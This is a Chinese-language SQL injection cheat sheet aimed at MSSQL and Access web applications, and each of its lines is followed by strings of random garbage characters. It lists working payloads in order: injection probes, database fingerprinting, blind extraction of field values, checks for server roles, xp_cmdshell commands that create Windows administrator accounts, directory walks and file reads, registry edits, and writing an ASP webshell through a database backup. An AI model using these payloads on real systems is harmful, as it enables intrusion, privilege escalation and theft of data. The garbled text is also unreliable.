1.判断是否有注入;and 1=1 ;and 1=2 1�Z}5y�kM3
2.初步判断是否是mssql ;and user>0 �L[Vk��6�e
�*S�Nd�U^!
3.注入参数是字符'and [查询条件] and ''=' \�P.h;�|u�
�G]=z
![�$
4.搜索时没过滤参数的'and [查询条件] and '%25'=' �_Q5m�PB�O
~</FF�'�Xz
5.判断数据库系统 �!1)aie+p6
"�,b:rgpRp
;and (select count(*) from sysobjects)>0 mssql 5�*�%Gh&�)
m�8fj\,�X
;and (select count(*) from msysobjects)>0 access b�p?5GU&Uy
ln82pQD2Y~
E��H�|�+S�
,0! �2x"Q=
6.猜数据库 ;and (select Count(*) from [数据库名])>0 �v1:.���t�
�>B{NxL3->
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 ~*�Y#�Y�{�
Ks%�0!X?3q
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 `�*8�}�q!.
t n�eT�Oj�
9.(1)猜字段的ascii值(access) G}pFy0W\S�
{U�=J>#@G
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 �Wzl/ @CPM
=��npE�?wK
(2)猜字段的ascii值(mssql) tY"eo�Pm�e
�0#]���fEi
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 Bg~�]�u+c*
z����+�"$G
10.测试权限结构(mssql) @N� Yl�4�N
\(�Sly&gL�
KYp�S4&X�h
�wm`<�+K�
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- �e�"�04jd/
[Fr�](&�Tx
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- ��~�n]5iGz
�_@ao$)q{J
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- *?X��&Y8Kf
9z#8K�
zXg
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- qi,) l*�?f
'�3l ��T�I
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- B#V��""[Y9
*c�b|9elF^
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- E`fG9:6l]�
��)7
�p"
-
;and 1=(select IS_MEMBER('db_owner'));-- ;_cTrj�Mv\
_N�`.1Dl%Q
�>-MnB���
�WN'AQ~q�A
11.添加mssql和系统的帐户 �T)m�Q+&�|
g"P%s�A/E+
;exec master.dbo.sp_addlogin username;-- <[�db)r~c�
;exec master.dbo.sp_password null,username,password;-- ��vy�wB{%p
ZexC3LD�"
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- s/"bH3Ob9v
H� a!,9{�T
;exec master.dbo.xp_cmdshell 'net user username password D���^[�l~K
z0}j7n�s]�
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- \j�C�) ;mk
�9lYKG�^#D
;exec master.dbo.xp_cmdshell 'net user username password /add';-- {�W,��5�]-
&�B�PYlfB1
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- d1D�
�f`��
�<<
6��GE�
A^OwT#�
c]9g�f\W�W
12.(1)遍历目录 Zy(i_�B-b
V"#0\�|]m
;create table dirs(paths varchar(100), id int) ahl|�N���`
�gnp.��!�-
;insert dirs exec master.dbo.xp_dirtree 'c:\' �f-F=!^��.
�+�fV�v��H
;and (select top 1 paths from dirs)>0 1b�V
�G%�N
2�w�.�FC��
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) #kW�=�|8�X
,%9XG0�77�
V�h\_Ko\V5
���ew1L��+
(2)遍历目录 e/D{^�*~�S
�1ub�u��~6
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- hV7EjQ���p
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 ,�j%\3�g`
Q�EJ�u.o��
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 WES�D�^�FK
b�sQ��'kBD
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 J||g(+�H>�
HJl?@&�l/�
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 5�sY���$��
|��xB`cSu(
S �F)$�b��
�u2#�q�7}�
13.mssql中的存储过程 u�d�/!@WG�
��v<1@"9EH
xp_regenumvalues 注册表根键, 子键 iV{_?f1jo
.V;,6Vq���
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 HkD.�W�6A3
!�4p{��b f
xp_regread 根键,子键,键值名 Kki(A�4;7F
J�T
7W�Zc)
;exec xp_regread 7\�UH�ADr
$>/��d�)�o
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 (�:b��f m�
/4r2B.�91O
xp_regwrite 根键,子键, 值名, 值类型, 值 XC3)#D#HGh
�o9xc$�hX}
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 *r�a)���u-
]�t��0o%w�
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 5Dkb/Ia�gi
li�*S^uSF�
xp_regdeletevalue 根键,子键,值名 N]�W*��e�i
=zn'0g,�J4
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 dy6zrgxygP
2?
E;�(]dQ
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 1�|�sem(�t
n{��Q��yqI
MXSD8]�j�e
�g����(&cq
14.mssql的backup创建webshell �NO*,�}aeG
:�a*>PMTn
use model vC,F�E
)'
T, �#-:� }
create table cmd(str image); (XOz_K6c%K
�1EV bGe%b
insert into cmd(str) values (''); ranem0KQ)]
�^JY �{<��
backup database model to disk='c:\l.asp'; !{�l% 3'2�
U�4d7-&U��
�dC6>&@
VX
� hE:~�~ox
15.mssql内置函数 ��O�<vBuD2
9':Ip�f&x�
;and (select @@version)>0 获得Windows的版本号 W1)SgiXnuy
0Jv6?7]LKa
;and user_name()='dbo' 判断当前系统的连接用户是不是sa WoXAO�j%iW
$j- Fm:ZIA
;and (select user_name())>0 爆当前系统的连接用户 �'p�A%lc�)
F>�.�y>��h
;and (select db_name())>0 得到当前连接的数据库 *A9�v��8�$
?,�VpZ%Df2
v�J0v��6\�
B>i%:��[-e
16.简洁的webshell �t3$�c��X_
ytj}��);,>
use model qBk[�Afjgz
�l
i<9nMZ<
create table cmd(str image); 0@_�8JB ?E
���$l�,U)�
insert into cmd(str) values (''); _L8&.=4]i
7}xQ4M\�u$
backup database model to disk='g:\wwwtest\l.asp';
